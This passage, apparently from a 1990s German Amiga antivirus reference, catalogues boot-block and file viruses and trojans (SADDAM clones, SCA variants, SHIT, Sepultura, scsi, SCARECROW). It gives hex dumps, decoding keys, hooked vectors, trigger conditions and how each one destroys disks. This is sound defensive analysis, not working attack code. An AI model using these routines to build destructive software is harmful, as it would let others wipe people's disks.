gehen soll, ist mir aber noch nicht klar. Begruendung: Der Nachprogrammierer hat nicht nur Namen geaendert, sondern auch noch 'trackdisk.device' geloescht. Deshalb kann BeginIo nicht verbogen werden. Also keine Codierung eines Blocks moeglich. VT erkennt SADDAM . Bitte einfach loeschen. Nachtrag 05.03.93: es ist ein neuer Clone augetaucht. Laurin-Virus Wird von VT als SADDAM-Clone erkannt. Blocklangwort: $a0a0a0a0 Namensbegruendung: im Speicher ist decodiert zu lesen 74726163 6B646973 6B2E6465 76696365 trackdisk.device 00010820 4C617572 696E2056 69727573 ... Laurin Virus Behandlung: siehe bei SADDAM Hinweis 05.03.93: Falls Sie noch mit KS1.3 arbeiten, so kopieren Sie sich bitte einen ORIGINAL-Disk-Validator auf die VT-Disk. Die Arbeit wird erleichtert. Ich darf das nicht, da es sich um ein Commodore-File handelt. Nachtrag 28.03.93: es ist ein neuer Clone aufgetaucht. Animal-Virus Wird von VT als SADDAM-Clone erkannt. Blocklangwort: $363636a0 Namensbegruendung: im Speicher ist decodiert zu lesen 74726163 6B646973 6B2E6465 76696365 trackdisk.device 00010820 416E696D 616C2056 69727573 ... Animal Virus Behandlung: siehe bei SADDAM Nachtrag 09.04.93: es ist ein neuer Clone aufgetaucht. KICK-Virus Wird von VT als SADDAM-Clone erkannt. Blocklangwort: KICK Namensbegruendung: im Speicher ist decodiert zu lesen 6b2e6465 76696365 00010820 204b4943 k.device... KIC 4b202056 49525553 00000000 03f30000 K VIRUS........ 00000000 00010000 00000000 00000000 ................ 01c50000 03e90000 01c55573 65204b69 ..........Use Ki 636b7374 61727420 312e322f 312e3300 ckstart 1.2/1.3. 00000000 00000000 00000000 00000000 ................ Use Kick... ist uncodiert im Disk-Validator-File zu lesen. Behandlung: siehe bei SADDAM Nachtrag 18.04.93: es ist ein neuer Clone aufgetaucht. NATO-Virus . Wird von VT als SADDAM-Clone erkannt. Blocklangwort: NATO Namensbegruendung: im Speicher ist decodiert zu lesen 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00010820 20204e41 544f2056 49525553 ... NATO VIRUS 00000000 03f30000 00000000 00010000 ................ 00000000 00000000 01c50000 03e90000 ................ 01c54772 65617465 73742048 756d616e ..Greatest Human 20204572 726f7200 00000000 00000000 Error......... Greatest... ist uncodiert im Disk-Validator-File zu lesen. Behandlung: siehe bei SADDAM Nachtrag 15.05.93: es ist ein neuer Clone aufgetaucht. AFFE-Virus . Wird von VT als SADDAM-Clone erkannt. Blocklangwort: AFFE Im Speicher ist zu lesen: 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00010820 476f7269 6c612056 69727573 ... Gorila Virus 00000000 03f30000 00000000 00010000 ................ 00000000 00000000 01c50000 03e90000 ................ 01c52167 6e696874 6f6e2079 61732c72 ..!gnihton yas,r 6165682c 65655300 00000000 00000000 aeh,eeS......... Man koennte auch Gorilla richtig schreiben. Nachtrag 18.05.93: es ist ein neuer Clone aufgetaucht. IRAN-Virus . Wird von VT als SADDAM-Clone erkannt. Blocklangwort: IRAN Im Speicher ist zu lesen: 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00010820 41796174 6f6c6c61 68766972 ... Ayatollahvir 00000000 03f30000 00000000 00010000 ................ 00000000 00000000 01c50000 03e90000 ................ 01c56e61 6320756f 79207461 6877206c ..nac uoy tahw l 6c61206c 6c696b00 00000000 00000000 la llik......... Ist schon schlecht, dass man mit einem Speichermonitor Virus abkuerzen muss, weil man nicht sagen kann, ob man das naechste Null-Wort noch verwenden darf. Meine Empfehlung: Gebts endlich auf. Jeder gesteht euch zu, dass ihr einen Satz fast vollstaendig richtig rueckwaerts schreiben koennt. Aber von Viren habt ihr KEINE Ahnung. Und ein AntiVirusPrg verwirrt ihr SO NIE. Nachtrag 24.05.93: es ist ein neuer Clone aufgetaucht. GRAL-Virus . Wird von VT als SADDAM-Clone erkannt. Blocklangwort: GRAL Im Speicher ist zu lesen: 74726163 6b646973 6b2e6465 76696365 trackdisk.device 00010820 486f6c79 4772616c 56697269 ... HolyGralViri 00000000 03f30000 00000000 00010000 ................ 00000000 00000000 01c50000 03e90000 ................ 01c52120 6c6c6568 20656874 206f7420 ..! lleh eht ot 79617720 65687400 00000000 00000000 yaw eht......... Nachtrag 07.08.93: es ist ein neuer Clone aufgetaucht. 4711 oder Parfum-Virus. Wird von VT im Speicher und beim File- oder BlockITest, als SADDAM-Clone erkannt. Neu ist, dass das Teil mit Hunk- Lab an SnoopDos V2.1 gelinkt war. Lesen Sie unten bei SnoopDos-SADDAM-Virus Blocklangwort: 4711 Block: 209 34373131 0001a2d0 0001a201 0001a3e8 4711............ Im falschen Disk-Validator ist nichts sinnvolles zu lesen. Im Speicher ist zu lesen: 6b2e6465 76696365 00010820 50617266 k.device... Parf 756d2056 69727573 00000000 03f30000 um Virus........ - SAO PAULO Virus BB im Speicher immer ab $7FC00 Cool $7FF3A nach Reset DoIo $7FF56 KS2.04: ja Fordert trackdisk.device NICHT . Namensbegruendung: im BB ist zu lesen SA0 PAULO! Fast der ganze Block 0 ist leer (Taeuschungsversuch ???) . Der Virencode steht in Block 1. Das Virusteil meldet sich nie . - SARON Es ist KEIN Virus Es ist ein XCopy 6.5 pro (Laenge: 27196 oder 28020) aufge- taucht, das beim Start im Cli zuerst in grossen Buchstaben SARON usw. ausgibt. Nach meiner Meinung enthaelt das File KEINEN Virus. VT bietet bei Filetest Ausbau an. - SATAN-Virus BB immer ab: $7CD30 Cool $7CDA6 im Prg DoIo $7CDD2 Fordert trackdisk.device NICHT . Vermehrung und Schaeden: BB Der Text im BB wird NIE erreicht . Namensbegruendung: im BB ist zu lesen 21212120 48696572 20737072 69636874 !!! Hier spricht 20646572 20534154 414e2021 21212120 der SATAN !!!! - SATAN-Virus anderer Name EXORCIST-Virus siehe oben Bitte verwechseln Sie die beiden SATAN nicht. - SCA Dos Kill siehe bei D&A Virus - SCA! BB im Speicher immer ab $7EC00 Cool, DoIo Fordert trackdisk.device NICHT Testet aber auf DOS0 Sichert seinen Speicherbereich NICHT !!!!! Mit nur 1MB Chip und KEIN Fastmem nach Reset deshalb (DoIo ist dann verbogen) Ueberschreibgefahr und damit GURU. Das liegt NICHT an VT, sondern kann mit anderen grossen Programmen genauso nachvollzogen werden !!!! Ohne Virus im Speicher muss auch mit nur 1MB Speicher der BB sicher erkannt werden. - SCA 2 keine Gefahr, nie bootfaehig, immer GURU deshalb in meinem Prg. nur Nicht-Standard-BB Begruendung: read $200 nach $7FC00 von Zylinder 79 und dann jmp $7FA00 (alles klar Anfaenger !!) - SCA-666 BB Clone s.o. Nur Text geaendert 20212121 8c783216 416e7469 63687269 !!!.x2.Antichri 73740069 7320636f 6d6d696e 67208232 st.is comming .2 3216616e 64207275 6c657320 74686520 2.and rules the 6d616e6b 696e6421 dc6e0000 4ef90000 mankind!.n..N... 00004120 36363620 36363620 36363620 ..A 666 666 666 - SCA-Baltasar BB Clone s.o. Nur Text geaendert 20202c20 8c783216 42616c74 61736172 , .x2.Baltasar 2d566972 75732031 39393420 20208232 -Virus 1994 .2 - SCA KarlMarx BB Clone s.o. Nur Text geaendert 32166672 6f6d204b 61726c20 4d617278 2.from Karl Marx 2056492e 20202021 dc6e0000 4ef90000 VI. !.n..N... 00006663 6b75756f 7920636b 6679756f ..fckuuoy ckfyuo - SCA-MAX-Virus BB Clone s.o. 6f732e6c 69627261 72790000 44454154 os.library..DEAT 4820464f 52205654 20424144 45535420 H FOR VT BADEST 4c414d45 52202021 21212020 20d2aa2d LAMER !!! ..- ;..... 32162047 72656574 73206672 6f6d204d 2. Greets from M 61737465 72202020 dc6e0000 4ef90000 aster .n..N... 0000412e 4d41583f 4d41583f 4d41583f ..A.MAX?MAX?MAX? Ein weiterer geistiger Tiefflug von MAX, mehr kann er halt nicht. - SCA-NASA Virus BB Nur Text geaendert 17646f6e 6520696e 20313939 33206279 .done in 1993 by 2041746f 6d697820 bea04113 20206f66 Atomix ..A. of 204e4153 41202121 21212020 2e2e2e50 NASA !!!! ...P - SCA-PAL Virus BB Clone s.o. 3216522e 492e502e 20706f6f 72205043 2.R.I.P. poor PC 20202121 21202020 dc6e0000 4ef90000 !!! .n..N... 00004121 50414c21 50414c21 50414c21 ..A!PAL!PAL!PAL! - SCA-PDS Virus BB Clone s.o. 65204779 73692066 6f722070 72657369 e Gysi for presi 64656e74 206f6620 42524420 20d2aa2d dent of BRD ..- 17504453 20697320 74686520 6f6e6c79 .PDS is the only - SCA-PKK Virus BB Clone s.o. 20206e32 5a0e4e41 5a492d56 49525553 n2Z.NAZI-VIRUS 20212121 8c783216 4d75736c 696d7320 !!!.x2.Muslims 74616b65 20796f75 72206c69 66658232 take your life.2 3216696e 20796f75 72206f77 6e206861 2.in your own ha 6e647320 20212121 dc6e0000 4ef90000 nds !!!.n..N... 00004121 504b4b21 504b4b21 504b4b21 ..A!PKK!PKK!PKK! - SCA-Sphinx-BB Clone s.o. Nur Text geaendert: 50041f6b 696c6c20 616c6c20 6b6e6f77 P..kill all know 6e207669 72757320 20757365 20697420 n virus use it 666f7232 5a0e7072 6f746563 74696f6e for2Z.protection 20212121 8c783216 4e75204e 75202e2e !!!.x2.Nu Nu .. 2e2e2e2e 202e2e2e 2e2e2e2e 2e2e8232 .... ..........2 32165370 68696e78 2066726f 6d205452 2.Sphinx from TR - SCA-TAI-Virus BB Clone s.o. Nur Text geaendert 75732020 8c783216 54686520 416e7469 us .x2.The Anti 6c616d65 7220496e 636f7270 6f726174 lamer Incorporat 696f6e20 66726f6d 204b6172 6c204d61 ion from Karl Ma 72782056 492e2020 dc6e0000 4ef90000 rx VI. .n..N... 00004121 54414921 54414921 54414921 ..A!TAI!TAI!TAI! - SCA defekt oder weitere Clones Es wird immer wieder versucht, das Original abzuaendern. z.B. Block 0 ist Original-SCA, Block 1 (also ab $200) ist irgendein Datenschrott. Ein solcher BB liegt vor und wird von VT als SCA-Clone erkannt. Begruendung: Die Vermehrungsroutine liegt in Block 0 und wird auch ausgefuehrt. Zum Absturz kommt es erst, wenn der Text ausgegeben werden soll. - ScanEbola97-Trojan siehe bei LiSA-3.0-Trojan - ScanLink-Trojan siehe bei WiREFACE-Trojan - scansystem siehe bei SystemScan-Trojan - scan.x-BBS-Bomb Keine verbogenen Vektoren. Reset nach der Zerstoerungsroutine. Es ist ein bnuke15.lha Archiv aufgetaucht. Laenge: 35050 Bytes Dieses Archiv enthaelt mehrere Files, die fuer BBS nuetzlich sein sollen: bossnuke.x 35308, ULOG.X 18560 usw. Ein derartiges Programmpaket mit V1.0 gibt es wirklich und das ist sauber. An ULOG.X ist nun ein Hunk angehaengt am Ende. Dieser letzte Teil ist codiert mit EORI.B #$12,D1 . Dieser codierte Teil erstellt 2 Files: a: BBS:COMMANDS/BBSCMD/L.info Laenge: 1060 In diesem Icon ist zu lesen: 00000b41 43434553 533d3030 31000000 ...ACCESS=001... 00164c4f 43415449 4f4e3d64 6f6f7273 ..LOCATION=doors 3a736361 6e2e7800 0000000d 4d554c54 :scan.x.....MULT 494e4f44 453d4e4f 00000000 0b505249 INODE=NO.....PRI 4f524954 593d3000 0000000b 53544143 ORITY=0.....STAC 4b3d3430 39360000 00000954 5950453d K=4096.....TYPE= 58494d00 00000000 00000000 00000000 XIM............. Es kommt also scan.x vor. Das Icon-Bild zeigt eine Steckkarte. b: doors:scan.x Laenge: 712 Dieses File enthaelt ausser DOS3 und dos.library nichts lesbares. Dieses Teil enthaelt die Zerstoerungsroutine. Ablauf: Ueber Zeiger in der dos.lib werden LWe gesucht. Die Routine wurde sehr aehnlich schon vom Modem-Virus (FUCK) benutzt. Durch die Zerstoerungsroutine werden die Bloecke mit DOS3 aufgefuellt. s.u. Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur Format. Versuche mit einer Syquest und DiskSalv2 waren nicht sehr erfolgreich. pZyl 1 Bl 22 444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3 444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3 444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3 444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3 Neu und schlimm: Das Programm erreicht durch subq.w #2,d1 auch den Rigid-Bereich (s.o. pZyl) . Das konnte der Modem- Check-Virus noch nicht. Das scan.x-File arbeitet auch ohne BBS . VT bietet loeschen an fuer: ULOG.X ,scan.x und L.info . Hinweis: falls es bei L.info Fehlerkennungen bei FileTest gibt, informieren Sie mich bitte. Von einer Erkennung der zerstoerten DOS3-Bloecke wurde abge- sehen, da eine format-routine existieren koennte, die genau so formatiert. Hinweis: Falls Sie glauben, dass irgendein Virusteil mit dem formatieren beginnt, schalten Sie SOFORT ihren Computer aus. Sie verlieren dann mit etwas Glueck nur EINE Partition. Das ist zwar schaedlich fuer die Hardware, aber halt der letzte Notnagel !!!! - SCARECROW-Trojan Zerstoerung bekannter Filename: IO4-INVI.EXE Namensbegruendung: siehe unten Filelaenge gepackt: #63484 Bytes Filelaenge entpackt: #100348 Bytes Nicht Resetfest Keine Verbogenen Vektoren Ein AMOS-Programm Nach Doc: ein Intel Outside 4 Demo Ablauf: Es wird ein Bild ausgegeben, das auch Text enthaelt: SCARECROW JUST ERASED ALL LAMENESS Danach ist ein Reset notwendig Schaden: - user-startup wird neu geschrieben Laenge: #4560 Bytes enthaelt dann: Text DevilCheck 2.0 Bugreport - startup-sequence wird neu geschrieben Laenge: #4924 Bytes enthaelt dann: Text VirusScanList V1.35 Sept. 96 VT bietet nur loeschen an. Die ueberschriebenen Files sind nicht zu retten. Legen Sie besser im S-Dir Kopien an. - SCARECROW-2-Trojan Zerstoerung bekannter Filename: ibrowse2 Namensbegruendung: siehe unten Filelaenge: #327848 Bytes Nicht Resetfest Keine Verbogenen Vektoren Ein AMOS-Programm Nach FileID: IBrowse 2.00 FINAL 68030+ Im File ist zu lesen: 000b5261 6d3a5072 6f746563 ..Ram:Protec 7400000b 52616d3a 4b696c6c 52444200 t...Ram:KillRDB. 002d5241 4d3a5072 6f746563 74205359 .-RAM:Protect SY 533a532f 73746172 7475702d 73657175 S:S/startup-sequ 656e6365 20464c41 47532052 57454400 ence FLAGS RWED. 00295241 4d3a5072 6f746563 74205359 .)RAM:Protect SY 533a532f 75736572 2d737461 72747570 S:S/user-startup 20464c41 47532052 57454400 00165359 FLAGS RWED...SY 533a532f 73746172 7475702d 73657175 S:S/startup-sequ 656e6365 00125359 533a532f 75736572 ence..SYS:S/user 2d737461 72747570 00215241 4d3a4b49 -startup.!RAM:KI 4c4c5244 42207363 73692e64 65766963 LLRDB scsi.devic 6520414c 4c20464f 52434500 00105255 e ALL FORCE...RU 4e203c4e 494c3a20 3e4e494c 3a200004 N <NIL: >NIL: .. 4e494c3a 00000000 NIL:.... Ablauf: Es wird ein Bild ausgegeben, das auch Text enthaelt: SCARECROW JUST ERASED ALL LAMENESS Einige Teile aus dem File werden nach Ram: geschrieben Schaden: - user-startup und startup-sequence wird neu geschrieben Laenge: #1304 Bytes enthaelt dann: ScareCrow Since i now have your undevided attention while you are trying to save what is left of your hard-disk i might as well begin. usw.... - killrdb wird gestartet und nach scsi.device gesucht. Falls ge- funden, wird der Rigid-Bereich zerstoert. VT bietet nur loeschen an. Die ueberschriebenen Files sind nicht zu retten. Legen Sie besser im S-Dir Kopien an. - SCARFACE BeginIo, KickTag, KickCheckSum, Vec5 FastMem nein Vermehrung: ueber BB ResetRoutine, die ueber Vec5 gesteuert wird (Zaehlzelle > $2710) Im BB sichtbar: z.B. SCARFACE Hinweis: In einer Viren-Sammlung wird ein Scarface II gefuehrt. Mit VT-vergleiche: Scarface: Scarface II 000: 444f5300 48bddd38 DOS.H..8 000: 444f5300 b1140dbd DOS..... a) ^^^^^^^^ ^^^^^^^^ 008: 00000370 60000006 ...p`... 008: 00000370 60000006 ...p`... 010: 00000232 48e77f7f ...2H... 010: 00000401 48e77f7f ....H. b) ^^^^ ^^^^ 328: 732e6c69 62726172 s.librar 328: 732e6c69 62726172 s.librar 330: 79000000 00000000 y....... 330: 79002400 0a825555 y.$...UU c) ^^^^^^^^^^^^^ ^^^^^^^^^^^^^ a) Pruefsumme muss sich immer aendern b) Zaehler c) Bereich, der vom Virusteil als Ablage verwendet wird, und IMMER anders aussieht. Der Viruscode ist sonst bis zum c-Bereich VOELLIG gleich. Sie sehen also, eine Unterscheidung ist nicht zu begruenden. - scsi-Virus File Laenge ungepackt: 1560 Bytes reines Zerstoerungsprogramm KEINE verbogenen Vektoren KS3.0: ja Keine Vermehrungsroutine Fileauszug: 2c780004 4eaefe3e 4e75733a 24e724a1 ,x..N..>Nus:$.$. ^^^^^^^^^^^^^ 00000000 00000000 00000000 00000000 ................ 00000000 00000000 00000000 00000000 ................ 00000000 00000000 00000000 00000000 ................ 00000000 00000000 00000000 00000000 ................ 00000000 00000000 00000000 00000000 ................ 00000000 646f732e 6c696272 61727900 ....dos.library. 8b624828 91819187 1e000000 00000000 .bH(............ ;;;;;;;; ::::::::::: ;;;; decodiert mit subi.b #$28,d0 ergibt: "c: ",0 :::: decodiert mit subi.b #$1E,d0 ergibt: "scsi",0 Ablauf: Test ob der Filename (^^^^) "s:$",E7,"$",A1,0 vorhanden ist. Falls ja, Virusprogrammende DateStamp wird aufgerufen und auf $15A0 = 27.Feb.93 ueberprueft. -Falls die Computerzeit noch nicht so weit ist, wird mit LoadSeg das Original-Programm aufgerufen ("c: ",0) und durch einen direkten Einsprung abgearbeitet. Danach wird UnloadSeg aufgerufen und das Virusprogramm beendet. -Falls die Systemzeit den 27.Feb.93 erreicht hat: Ueber dosbase+$22 wird die device-Liste durchsucht. Verglichen werden NUR devices (keine Vol usw.) mit scsi (s.o.). Also ein Test auf vier Buchstaben. d.h. alles was mit scsi beginnt, wird ausgewaehlt. auch scsi3... usw. NICHT ausgewaehlt wird SCSI oder gvpscsi usw. Danach wird der ROOT-Block berechnet und durch Auffuellen mit Nullen zerstoert. WICHTIG: Da dieser Vorgang in einer Schleife ablaeuft, werden ALLE Root-Bloecke von ALLEN Laufwerken und ALLEN Partitionen, die die Vorgabe erfuellen, zerstoert. Hab ich mit einer Wechsel- platte und drei Partitionen ausprobiert. VT erkennt das Virus-File und bietet Rename mit dem Original- File in c: an. Falls das Original-File in c: nicht gefunden wird, schlaegt VT vor, das Virus-File allein zu loeschen. Hinweis: Mit DiskSalv Repair konnten alle Partition wieder herge- stellt werden, da der Root-Block jeweils neu aufgebaut wurde. Bitte besorgen Sie sich deshalb DiskSalv (neuste Version 93) BEVOR der Unfall passiert. DiskSalv belegt die Partition mit dem Namen wanagi-wachipi . Also so aehnlich wie diskdoctor mit Lazarus frueher. Wichtig 2: Es MUSS ein INSTALL-Programm geben. Dieses ist bis jetzt nicht bekannt. Bitte helfen Sie mit bei der Suche. Danke ! Denn niemand benennt freiwillig ein Original-Programm in ein unsichtbares File in c: um. - SDS-schaedl.Prg Susi_Drive_Stepper KEIN Virus Laenge: 904 Bytes KEINE Vermehrung KEINE verbogenen Vektoren Im File ist zu lesen: 65736f75 72636500 73757369 00616e64 esource.susi.and 72656100 76616c65 6e74696e 6100696e rea.valentina.in 67726964 00636872 69730000 0a000120 grid.chris..... Vorsicht: das File bewegt den LWs-Kopf sehr schnell. Wie lange das ihr LW aushaelt sollten Sie NICHT ausprobieren. Das File wurde aufgenommen um die Erbsenzaehler zu beruhigen. Ich sehe KEINEN Grund, warum jemand freiwillig dieses Prg. starten sollte. - Self-Writer andere Namen: Pseudoselfwriter siehe bei Lamer da im entschluesselten Programm The LAMER Ex... zu lesen ist und das Verhalten einem Lamervirus entspricht, halte ich eine Zuordnung zur Lamer-Gruppe fuer richtig. - Sendarian Revenge V1.2-Clone, Cool, DoIo, Vec5, im Speicher $7e000 und Speicherstelle $C0-$FF (Gefahr fuer setpatch-Liste) Vermehrung: ueber BB Schaden: nach einiger Zeit neuer Mauszeiger im BB sichtbar: Sendarian #1Count: - Sentinel-Virus BB Excrement-Clone (Texte geaendert) Nachtrag 08.07.93: Es wird auch der Name USSR 492 verwendet, da aber auf "Sent" im Virus selbst getestet wird, halte ich den Namen Sentinel fuer sinnvoller. Cool: $7F47A DoIo: $7F4C2 immer ab: $7F400 KS2.06: GURU B nach Reset Fordert trackdisk.device NICHT Namensbegruendung: im BB ist zu lesen: 61727900 53656e74 696e656c 21002d7c ary.Sentinel!.-. Vermehrung: BB linke Maustaste= Abbruch und Cool-Vektor loeschen Test auf DOS-Kennung Test ob schon verseucht mit cmpi.l #"Sent",$6c(a4) Was natuerlich FALSCH ist. An dieser Stelle steht Sent NIE !!! Richtig waere $54(a4). Anfaenger merke, nicht jeder der Texte aendern kann, versteht auch die Codierung. (vgl. bei EXCREMENT) Schaeden: Sobald eine Zaehlzelle den Wert $A erreicht hat, blinkt die LED. Mehr ist bei mir nicht passiert. anderer Name: USSR 492 - Sepultura-BB-Virus Bootblock Verbogene Vektoren: Cool, DoIo, Forbid, DisplayAlert Fordert trackdisk.device NICHT Decodiert ist im BB zu lesen: 732e6c69 62726172 79000054 68652053 s.library..The S 6570756c 74757261 2d566972 75732120 epultura-Virus! 6d616465 20627920 4d617820 6f662053 made by Max of S 7461724c 69676874 2032342f 332f3933 tarLight 24/3/93 003e436f 70696573 3a303031 3c0048e7 .>Copies:001<.H. Der BB wird immer neu in Abhaengigkeit von $DFF00A codiert. Schaden: Sobald eine Zaehlzelle den Wert $F erreicht hat, wird ein Text (s.o.) in Block 880 geschrieben. Bei einer Disk ist das der Rootblock (bei einer Festplatte kann es ein Fileblock sein). Die Disk ist danach unbrauchbar. Block 880 vorher Block 880 zerstoert 00: 00000002 00000000 ........ : 54686520 53657075 The Sepu 08: 00000000 00000048 .......H : 6c747572 612d5669 ltura-Vi 10: 00000000 00000000 ........ : 72757321 206d6164 rus! mad 18: 00000000 00000000 ........ : 65206279 204d6178 e by Max 20: 00000000 00000000 ........ : 206f6620 53746172 of Star 28: 00000037 00000000 ...7.... : 4c696768 74203234 Light 24 30: 00000000 00000000 ........ : 2f332f39 33004b09 /3/93.K. - SEPULTURA-Virus File Laenge ungepackt: 1876 Bytes KS1.3 : ja KS2.04: Endlos-GURU . Sie muessen den Computer ausschalten. Tastatur-Reset fuehrt wieder zu GURU. Laden eines Files z.B. KReset ist auch nicht moeglich. Verbogene Vektoren: KickTag, KickCheckSumPointer Open, Lock, Delete, Rename, LoadSeg Zeitweise verbogene Vektoren: $6c, FindResident Das Programm rettet fast KEINE Vektoren !!!!! Arbeitet mit df0:, df1: und df2: . Mehr Laufwerke hat der Programmierer wahrscheinlich nicht. Namensbegruendung: s.u. lat. sepultura = Begraebnis Ein Speicherbereich wird decodiert mit: eori.b #$FB,(a0)+ 0000646f 732e6c69 62726172 79006466 ..dos.library.df 303a732f 73746172 7475702d 73657175 0:s/startup-sequ 656e6365 00006466 303aa0a0 a0a00000 ence..df0:...... ^^^^^^^^^ ^^^^^ unsichtbarer Filename "A0A0A0A0" in Root von df0/1/2 . Die Null der beiden df0: wird bei Bedarf im Programm-Code durch 1 oder 2 ersetzt. Ausgabe eines Textes mit DisplayAlert in Abhaengigkeit von $DFF006 . Fuer DisplayAlert wird bei Bedarf ein Speicherbereich decodiert mit: eori.b #$FA,(a0)+ 790000fa 0a486920 4775797a 20212100 y....Hi Guyz !!. 0100a014 53455055 4c545552 41207374 ....SEPULTURA st 72696b65 73206261 636b2077 69746820 rikes back with 74686569 72206e65 77000100 fa232056 their new....# V 49525553 21212100 01009632 4c6f6f6b IRUS!!!....2Look usw....... Hinweis: Ein Satz, der decodiert wird, erscheint nicht beim Alert. Wahrscheinlich hat sich der Programmierer verzaehlt. Vor Schreibzugriff auf Disk wird getestet auf: - validated - max $6a0=1696 Bloecke belegt Empfehlung: unsichtbares File in Root loeschen und in startup- sequence die entsprechende Zeile entfernen. VT kennt: 14.04.93 VT setzt ALLE Vektoren zurueck . - Sepultura2.26-Virus File Laenge ungepackt: 1980 Bytes KS1.3 : ja KS2.04: ja 68030 : bei mir GURU 3 Verbogene Vektoren: Open, Lock, Delete, Rename, LoadSeg NICHT resetfest (also KickTag nicht mehr verbogen) Arbeitet mit df0:, df1: und df2: . Im Speicher wird decodiert mit: eori.b #$XY,(a0)+ XY aendert sich bei jeder Vermehrung in Abhaengigkeit von $DFF006. 6C696272 61727900 6466303A 732F7374 library.df0:s/st 61727475 702D7365 7175656E 63650000 artup-sequence.. 6466303A A0A0A0A0 00000000 df0: .... ^^^^^^^^ ^^^^^ unsichtbarer Filename "A0A0A0A0" in Root von df0/1/2 . Die Null der beiden df0: wird bei Bedarf im Programm-Code durch 1 oder 2 ersetzt. Namensbegruendung: Im Speicher ist zu lesen: 20536570 Sep 756C7475 72612028 56322E32 36290000 ultura (V2.26).. Bitte aendern Sie auch die startup-sequence !!! - SHI-Virus BB s.o. Aust.Par-Clone BB Nur Text geaendert - SHIT-Virus (BB) nicht mit KS2.04, nicht mit FastMem KickTag, KickCheckSum, BeginIo, Vec5, $64, $68, $6c haeufig GURU Zeitzaehler: 8 Min setzt irgrndwann $60 auf 0 codiert mit: eor.w d0, (a0)+ add.w $xyz(pc),d0 Im codierten BB ist zu lesen: Nuked007 (wobei Nu=RTS) Zugeschickt wurde mir der BB als Ethik-BB. Diesen Namen kann ich nicht nachvollziehen. Zugeschickt wurde mir ein BB als HACKERS-BB. Diesen Namen kann ich nicht nachvollziehen (auch nicht im Speicher). Schaeden in Abhaengigkeit von der Zaehlzelle: - schreibt $1400 Bytes ab Block 0 (Absicht ???) zerstoert also auch Files die ab Block 2 liegen - schreibt in einen Block ab $30 SHIT addiert 8 zu $10 im Block (bei OFS=NextDataBlock) addiert 8 zu $14 im Block (bei OFS=BlockCheckSum) schreibt den veraenderten Block dann 1 Position spaeter zurueck. Diese Files sind NICHT zu retten !!!!!!!! Hinweis: Da bei BlockKette und BlockITest nur auf "SHIT" an $30 getestet werden kann (mehr gibt es nicht), KANN es zu Fehlerkennungen kommen !!!! Gefaehrlich: in weniger als 5 Minuten habe ich 12 SHIT-Bloecke auf einer Disk erzeugt !!! Decodiert ist im Speicher zu lesen: 002450a8 001050a8 0014217c 53484954 .$P...P...!|SHIT ;..... 6000fd1a 74726163 6b646973 6b2e6465 `...trackdisk.de 76696365 00616d69 6761646f 732e6c69 vice.amigados.li 62726172 79000000 00003a4b 00fe9c3e brary.....:K...> Beispiele fuer SHIT in einem Block: Beispiel fuer eine Fehlerkennung: Block: 1580 0010: 0000062d d4d0f761 4e004255 4c4c4f43 ...-...aN.BULLOC 0020: 4b004255 4c4c5345 59450000 42554c4c K.BULLSEYE..BULL 0030: 53484954 00004255 4c4c5900 42554c52 SHIT..BULLY.BULR 0040: 55534800 42554c57 41524b00 42554d42 USH.BULWARK.BUMB SHIT steht zwar an $30, aber es ist ein Wort "BULLSHIT". Es handelt sich also um eine VT-Fehlerkennung !!!!!! Falls Sie also einen Textzusammenhang herstellen koennen, denken Sie bitte an eine Fehlerkennung. Ich hoffe aber, dass die $30-SHIT-Zufaelle eher selten vorkommen. Es gibt KEIN weiteres Testmerkmal. Beispiele fuer eine ECHTE Zerstoerung: Block: 415 0020: a8da2951 a4caa213 00ba84aa 3129546a ..)Q........1)Tj 0030: 53484954 2f252a8c 62551bac aa3e9954 SHIT/%*.bU...>.T 0040: 72f2a8fc c02e716a 8c6ad51a b5aa35eb r.....qj.j....5. Block: 787 0020: d301d542 60167c02 1e3b70e8 d2016604 ...B`.|..;p...f. 0030: 53484954 d5425307 66f2d446 7c003a46 SHIT.BS.f..F|.:F 0040: 3e03d201 66041220 d3016436 d643d201 >...f.. ..d6.C.. Block: 848 0020: 27191ef0 b7952d78 d4d74ffc 05519389 '.....-x..O..Q.. 0030: 53484954 43224310 173ee88a 89343b31 SHITC"C..>...4;1 0040: 6c3e48ee 311d3a1d 1f4c8467 6fc107cc l>H.1.:..L.go... Diese Disk wurde wirklich von SHIT zerstoert. Sie sehen, es wird nur SHIT geschrieben und KEIN anderer Text ist in der Naehe. - Shocked-Gag siehe bei Trick-Gag - SILESIAN-BB-Virus s.o. MOSH.1.0-BB-Virus - SILESIAN-Virus Linkvirus siehe bei INVADER-Virus - SMBX-Mount Virus File Laenge ungepackt: 65488 Bytes KEINE verbogenen Vektoren. Installiert Mount-Virus (s.o.) Namensbegruendung: im File ist zu lesen: 00000000 00001897 733a534d 42582d44 ........s:SMBX-D 4f532e63 66675573 6572203a 20526573 OS.cfgUser : Res ...... 6963652f 2f2f2f2f 202d444f 532d5368 ice///// -DOS-Sh 656c6c20 56202863 29313939 312f3932 ell V (c)1991/92 Ein aufmerksamer User hat das Teil gefunden. Danke !!!!!! Es handelt sich um ein Shell-Programm, das mit einem Mail- box-Programm mitgeliefert werden soll? Das codierte Mount-Virus-Teil liegt von $EC38 bis $F068 im File. Es handelt sich beim Shell-Programm um eine Gfa-Basic- Compilierung und die Decodierung findet IM Gfa-Teil statt. Deshalb muss nach meiner Meinung der Programmierer des Mount- Virus-Teils den Source-Code des Basicprogramms besitzen. Ein Ausbau ist aus oben genannten Gruenden nicht moeglich. Empfehlung deshalb: loeschen und bei der Lieferfirma nach dem Programmierer forschen !!! - Smeg-Virus File Link ab KS2.04: ja (Versionsabfrage auf mind. #37) Namensbegruendung: im Linkteil ist decodiert zu lesen: 79002e69 6e662e6c 68612e6c 7a782e44 y..inf.lha.lzx.D 4d53000a 536d6567 21204974 27732061 MS..Smeg! It's a 0a486f73 74696c65 2054616b 654f7665 .Hostile TakeOve 7221 r! Verbogener Zeiger: $6c(ProcessStruktur) <> ProcessStrukturStart Resetfest: Nein Fileverlaengerung: 1900 Bytes Link hinter den ersten Hunk. Speicherverankerung: Die Lib-Liste wird durchlaufen. In Abhaengigkeit von 